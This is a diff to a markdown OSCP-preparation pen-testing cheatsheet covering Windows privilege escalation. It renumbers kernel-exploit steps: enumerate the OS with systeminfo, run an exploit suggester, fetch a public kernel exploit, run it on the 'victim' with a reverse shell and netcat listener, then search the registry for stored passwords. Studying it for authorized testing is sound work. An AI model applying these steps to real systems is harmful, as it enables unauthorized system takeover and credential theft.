airadulescu/Pen-Test-Guidebook-Cheatsheet-OSCP-Preperation-/A. Full Guide (Enumeration to Priv Escalation).md

  ### Kernal exploits (last resort)
+ 0. `systeminfo | findstr /B /C:"OS Name" /C:"OS Version" /C:"System Type"`
+ 1. `>driverquery /v` and searchsploit
- 0. Extract `systeminfo` and save it to systeminfo.txt in kali (should be in same directory)
+ 2. Extract `systeminfo` and save it to systeminfo.txt in kali (should be in same directory)
- 1. `python wes.py systeminfo.txt -i 'Elevation of Privilege' --exploits-only | more`
+ 3. `python wes.py systeminfo.txt -i 'Elevation of Privilege' --exploits-only | more`
- 2. cross reference with the site https://github.com/SecWiki/windows-kernel-exploits to see if we have binaries
+ 4. cross reference with the site https://github.com/SecWiki/windows-kernel-exploits to see if we have binaries
- 3. Move the binary to window victim and run it with reverseshell to get root.
+ 5. Move the binary to window victim and run it with reverseshell to get root.
- 4. open netcat listener
+ 6. open netcat listener
- 5.  `.\x64.exe C:\PrivEsc\reverse.exe`
+ 7.  `.\x64.exe C:\PrivEsc\reverse.exe`

  ### Passwords
  1. `.\winPEASany.exe quiet filesinfo userinfo` or manually  ` reg query HKLM /f password /t REG_SZ /s` and `reg query HKCU /f password /t REG_SZ /s`